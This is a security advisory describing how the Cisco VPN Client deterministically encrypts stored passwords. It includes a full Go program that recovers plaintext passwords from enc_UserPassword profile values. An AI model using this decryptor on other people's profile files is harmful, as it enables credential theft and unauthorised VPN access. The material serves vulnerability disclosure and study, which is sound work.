The Cisco VPN Client uses weak encryption to store user and group passwords in your local profile file.

Credit:
The original article can be found at: http://evilscientists.de/blog/?page_id=343
The main problem with the method used to encrypt the passwords is that the whole procedure is deterministic and no user input (such as a passphrase) goes into it. This effectively means that the encryption keys the Cisco client calculates can also be calculated by any other program, as long as that program knows the algorithm. Worse, the hash h1 from which all key material is derived is stored in the profile file right next to the ciphertext, so the file alone contains everything needed to recover the plaintext. This algorithm has now been reversed.
The algorithm:
The algorithm used to encrypt a given user/group password is shown below (for further details see the source code):
* The current date is retrieved as a string (e.g. Mon Sep 19 20:00:00 2005)
* A SHA-1 hash h1 (20 bytes) is computed from that string
* h1 is modified and a new hash h2 is calculated
* h1 is modified again and h3 is calculated
* The 3DES key is made of h2 and the first 4 bytes of h3
* The password is encrypted using 3DES in CBC mode. The IV consists of the first 8 bytes of h1
* A last hash h4 is computed over the encrypted password
* The key enc_UserPassword in the profile file now looks like this: h1|h4|encrypted password
The Cisco Password Revealer along with the source code can be found here.
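As an added example (this is not the Cisco Password Revealer's own source, nor Cisco's), here is a stand-alone Go implementation of both directions of the procedure listed above, so the deterministic key derivation can be checked end to end. Two details the list leaves open are assumptions here, taken from the public vpnc cisco-decrypt tool rather than from this page: the "modification" of h1 is an increment of its last byte (+1 for h2, +3 for h3), and the password is padded PKCS#7-style to the 8-byte block size. The date string and password in main are constructed sample input.

```go
package main

import (
	"bytes"
	"crypto/cipher"
	"crypto/des"
	"crypto/sha1"
	"encoding/hex"
	"errors"
	"fmt"
)

// deriveKeyIV rebuilds the 3DES key and IV from h1, the SHA-1 of the date
// string. h1 is stored in the clear at the front of enc_UserPassword, so
// anyone holding the profile file can run this function.
//
// Assumption (this page does not spell the tweak out): "modifying" h1 means
// incrementing its last byte, by 1 for h2 and by 3 for h3.
func deriveKeyIV(h1 [20]byte) (key [24]byte, iv [8]byte) {
	t := h1 // array copy; h1 itself stays untouched
	t[19]++ // h2 = SHA-1(h1 with last byte + 1)
	h2 := sha1.Sum(t[:])
	t[19] += 2 // h3 = SHA-1(h1 with last byte + 3)
	h3 := sha1.Sum(t[:])
	copy(key[:20], h2[:]) // key = h2 || h3[0:4]  (24 bytes, DES parity bits ignored)
	copy(key[20:], h3[:4])
	copy(iv[:], h1[:8]) // IV = first 8 bytes of h1
	return key, iv
}

// Obfuscate performs the client-side encryption described above and returns
// the hex-encoded enc_UserPassword value h1 | h4 | ciphertext.
// Assumption: the password is padded PKCS#7-style to the 8-byte block size.
func Obfuscate(date, password string) string {
	h1 := sha1.Sum([]byte(date))
	key, iv := deriveKeyIV(h1)
	pad := 8 - len(password)%8
	plain := append([]byte(password), bytes.Repeat([]byte{byte(pad)}, pad)...)
	block, err := des.NewTripleDESCipher(key[:])
	if err != nil {
		panic(err) // only possible with a key of the wrong length
	}
	ct := make([]byte, len(plain))
	cipher.NewCBCEncrypter(block, iv[:]).CryptBlocks(ct, plain)
	h4 := sha1.Sum(ct) // integrity hash over the ciphertext, unkeyed
	blob := make([]byte, 0, 40+len(ct))
	blob = append(blob, h1[:]...)
	blob = append(blob, h4[:]...)
	blob = append(blob, ct...)
	return hex.EncodeToString(blob)
}

// Reveal recovers the plaintext from an enc_UserPassword value without any
// secret input: every byte of key material is derived from the stored h1.
func Reveal(encUserPassword string) (string, error) {
	blob, err := hex.DecodeString(encUserPassword)
	if err != nil {
		return "", err
	}
	if len(blob) < 48 || (len(blob)-40)%8 != 0 {
		return "", errors.New("malformed enc_UserPassword: need h1(20)|h4(20)|ciphertext(n*8)")
	}
	var h1 [20]byte
	copy(h1[:], blob[:20])
	h4, ct := blob[20:40], blob[40:]
	if sum := sha1.Sum(ct); !bytes.Equal(sum[:], h4) {
		return "", errors.New("h4 mismatch: ciphertext corrupted or value not in this format")
	}
	key, iv := deriveKeyIV(h1)
	block, err := des.NewTripleDESCipher(key[:])
	if err != nil {
		return "", err
	}
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, iv[:]).CryptBlocks(pt, ct)
	pad := int(pt[len(pt)-1])
	if pad < 1 || pad > 8 {
		return "", errors.New("bad padding after decryption")
	}
	return string(pt[:len(pt)-pad]), nil
}

func main() {
	// Constructed sample: the date string from the description and a made-up password.
	v := Obfuscate("Mon Sep 19 20:00:00 2005", "s3cret")
	fmt.Println("enc_UserPassword =", v)
	pw, err := Reveal(v)
	fmt.Println("recovered:", pw, err)
}
```

Reveal needs nothing but the profile value itself, which is the whole point: h1 sits in front of the ciphertext, so the "key" is effectively stored next to the data it protects. Note also that h4 is an unkeyed SHA-1 over the ciphertext, so it only detects accidental corruption; anyone who can rewrite the profile file can recompute it, and it offers no protection against tampering.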